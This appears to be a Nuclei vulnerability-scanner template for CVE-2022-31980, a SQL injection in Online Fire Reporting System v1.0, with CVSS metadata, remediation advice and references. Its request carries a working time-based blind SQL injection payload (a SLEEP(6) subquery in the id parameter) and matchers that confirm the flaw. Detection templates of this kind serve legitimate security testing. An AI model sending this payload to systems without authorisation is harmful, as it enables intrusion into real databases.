45 lines
1.7 KiB
YAML
45 lines
1.7 KiB
YAML
id: CVE-2022-31980
|
|
|
|
info:
|
|
name: Online Fire Reporting System v1.0 - SQL injection
|
|
author: theamanrawat
|
|
severity: high
|
|
description: |
|
|
Online Fire Reporting System v1.0 is vulnerable to SQL Injection via /ofrs/admin/?page=teams/manage_team&id=.
|
|
remediation: |
|
|
To remediate this vulnerability, ensure that all user-supplied input is properly validated and sanitized before being used in SQL queries.
|
|
reference:
|
|
- https://github.com/debug601/bug_report/blob/main/vendors/oretnom23/online-fire-reporting-system/SQLi-7.md
|
|
- https://www.sourcecodester.com/php/15346/online-fire-reporting-system-phpoop-free-source-code.html
|
|
- https://nvd.nist.gov/vuln/detail/CVE-2022-31980
|
|
classification:
|
|
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H
|
|
cvss-score: 7.2
|
|
cve-id: CVE-2022-31980
|
|
cwe-id: CWE-89
|
|
epss-score: 0.00609
|
|
epss-percentile: 0.76231
|
|
cpe: cpe:2.3:a:online_fire_reporting_system_project:online_fire_reporting_system:1.0:*:*:*:*:*:*:*
|
|
metadata:
|
|
verified: "true"
|
|
max-request: 1
|
|
vendor: online_fire_reporting_system_project
|
|
product: online_fire_reporting_system
|
|
tags: cve,cve2022,sqli,online-fire-reporting
|
|
|
|
http:
|
|
- method: GET
|
|
path:
|
|
- "{{BaseURL}}/admin/?page=teams/manage_team&id=1'+AND+(SELECT+7774+FROM+(SELECT(SLEEP(6)))dPPt)+AND+'rogN'='rogN"
|
|
|
|
matchers:
|
|
- type: dsl
|
|
dsl:
|
|
- 'duration>=6'
|
|
- 'status_code == 200'
|
|
- 'contains(content_type, "text/html")'
|
|
- 'contains(body, "Control Teams")'
|
|
condition: and
|
|
|
|
# digest: 4a0a00473045022100a492e043fea4f7145b532912ef9d19b0a5c044565be2adda8ac678b977b192bd02204f9582cb180529f986f9bc06543b46e916d0a5fa901bf02a2e5d9df489832c97:922c64590222798bb761d5b6d8e72950
|